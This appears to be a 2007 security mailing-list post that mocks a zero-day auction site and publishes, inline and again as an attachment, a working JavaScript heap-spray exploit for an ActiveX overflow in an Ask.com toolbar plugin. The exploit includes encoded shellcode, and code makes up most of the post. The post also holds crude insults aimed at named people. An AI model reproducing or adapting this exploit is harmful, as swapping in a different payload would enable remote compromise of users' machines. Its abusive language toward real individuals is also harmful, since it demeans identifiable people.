Re: New Zeroday published Sep 24 2007 04:46PM
Joey Mengele (joey mengele hushmail com)
Dear Security List Moderator,

Proving itself to be the true iDefense of the New Millenium (TM),
WabiSabiLabia has released a new worthless bug and exploit to their
auction area [1]. Attached is an exploit for the bug, which is
described by WabiSabiLabia at the end of this electronic
correspondence. It is included inline as well as an attachment.

STOP WABISABILABIA EXPLOITATION OF DISEASED HACKER OVERACHIEVERS!
KILL ALL WABISABILABIA BUGS BEFORE SALE!
YOU TOO CAN PREVENT FOREST FIRES! [2]

J

[1] http://www.wslabi.com/wabisabilabi/initPublishedBid.do?
[2] Gadi Evron is a fat fuck who invented DNS

___ BEGIN ___

<html>
<SCRIPT language="javascript">
// This is new technique I invent call 'heap fill attack'
var str0ke = 0x0d0d0d0d;
var sucks = unescape( // Launch the system calculator 100 times
because what else?
// This code currently not work on
Solaris/Sparc

"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%
u5F8B%u0120" +

"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%
u543B%u0424" +

"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%
u245C%uC304" +

"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%
u808B%u00B0" +

"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%
uFE98%u0E8A" +
"%uFF57%u63E7%u6C61%u0063");
var dick = 0x400000;
var j0hnson = sucks.length * 2;
var spraySlideSize = dick - (j0hnson+0x38);
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (str0ke - 0x400000)/dick;
memory = new Array();for (i=0;i<heapBlocks;i++)
{memory[i] = spraySlide + sucks;}
try{
gadi = new ActiveXObject( 'AskJeevesToolBar.SettingsPlugin.1' );
}
catch(evron)
{
alert(evron);
}
netdev = "A";
while (netdev.length != 0x5e0)
netdev += "A";
netdev += unescape("%0d%0d%0d%0d");
gadi.ShortFormat = netdev;
function getSpraySlide(spraySlide, spraySlideSize)
{while (spraySlide.length*2<spraySlideSize){
spraySlide += spraySlide;}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;}
</script>
</html>

___ END ___

On Mon, 24 Sep 2007 06:06:39 -0400 webmaster (at) wslabi (dot) com [email concealed] wrote:
>NEW ZERODAY PUBLISHED
> A new zeroday has been published with Wabisabilabi code
>ZD-00000148
> THIS ITEM IS SOLD UNDER THIS SCHEME: AUCTION
>
> Title
> ask.com toolbar remote vulnerability
> Time to live
> 14 days, 20 hours, 52 minutes
> Vulnerability type
> client side
> Affected system
> Windows XP
> Remote
> true
> Local
> false
> PoC
> true
> Public description
> ask.com toolbar suffers from a remote vulnerability.
>Affected version is 4.0.2.53. PoC is included. Further informations
>for registered bidders only.
>-------------------------
> You received this newsletter because you ask to do
>this.
> If you don't want to receive its anymore or if you
>didn't ask to receive its, follow the link below.
>
>https://wslabi.com/wabisabilabi/initUnsubscribeNewsletter.do?unsubs
>cribeKey=vorUuSZWl%2BIeVytn%2FqzINkgmIGYXxC5bvB4XUqsQKwrbOtcMr%2FvN
>GpdBuP1PZ%2Fn0hBNb24xl%2Bl5VymAlSH3880%2FoYzxcUxflmW6JrGaF1Uo%3D[1]
>
>
>
>Links:
>------
>[1]
>https://wslabi.com/wabisabilabi/initUnsubscribeNewsletter.do?unsubs
>cribeKey=vorUuSZWl%2BIeVytn%2FqzINkgmIGYXxC5bvB4XUqsQKwrbOtcMr%2FvN
>GpdBuP1PZ%2Fn0hBNb24xl%2Bl5VymAlSH3880%2FoYzxcUxflmW6JrGaF1Uo%3D

--
Learn to trade with confidence! Online Stock Trading. Click Now!
http://tagline.hushmail.com/fc/Ioyw6h4dPcyLNZ17lB9vRyAs4l1IBZwCAErul3L3i
zy467fkCZudD2/
<html>

<SCRIPT language="javascript">

// This is new technique I invent call 'heap fill attack'

var str0ke = 0x0d0d0d0d;

var sucks = unescape( // Launch the system calculator 100 times because what else?

// This code currently not work on Solaris/Sparc

"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8
B%u0120" +

"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543
B%u0424" +

"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245
C%uC304" +

"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808
B%u00B0" +

"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE9
8%u0E8A" +

"%uFF57%u63E7%u6C61%u0063");

var dick = 0x400000;

var j0hnson = sucks.length * 2;

var spraySlideSize = dick - (j0hnson+0x38);

var spraySlide = unescape("%u9090%u9090");

spraySlide = getSpraySlide(spraySlide,spraySlideSize);

heapBlocks = (str0ke - 0x400000)/dick;

memory = new Array();for (i=0;i<heapBlocks;i++)

{memory[i] = spraySlide + sucks;}

try{

gadi = new ActiveXObject( 'AskJeevesToolBar.SettingsPlugin.1' );

}

catch(evron)

{

alert(evron);

}

netdev = "A";

while (netdev.length != 0x5e0)

netdev += "A";

netdev += unescape("%0d%0d%0d%0d");

gadi.ShortFormat = netdev;

function getSpraySlide(spraySlide, spraySlideSize)

{while (spraySlide.length*2<spraySlideSize){

spraySlide += spraySlide;}

spraySlide = spraySlide.substring(0,spraySlideSize/2);

return spraySlide;}

</script>

</html>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus